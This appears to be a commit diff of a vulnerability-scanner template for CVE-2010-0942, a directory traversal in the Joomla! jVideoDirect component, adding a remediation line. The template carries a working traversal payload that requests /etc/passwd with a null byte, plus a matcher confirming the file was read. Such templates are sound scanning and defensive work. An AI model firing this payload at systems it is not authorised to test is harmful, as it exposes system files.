Enhancement: cves/2010/CVE-2010-0942.yaml by mp

patch-1
MostInterestingBotInTheWorld 2022-02-13 14:10:18 -05:00
parent bcac161f98
commit d7eba0c0ca
1 changed files with 5 additions and 6 deletions

View File

@ -1,27 +1,26 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Apply all relevant security patches and product upgrades.
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-0942
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/13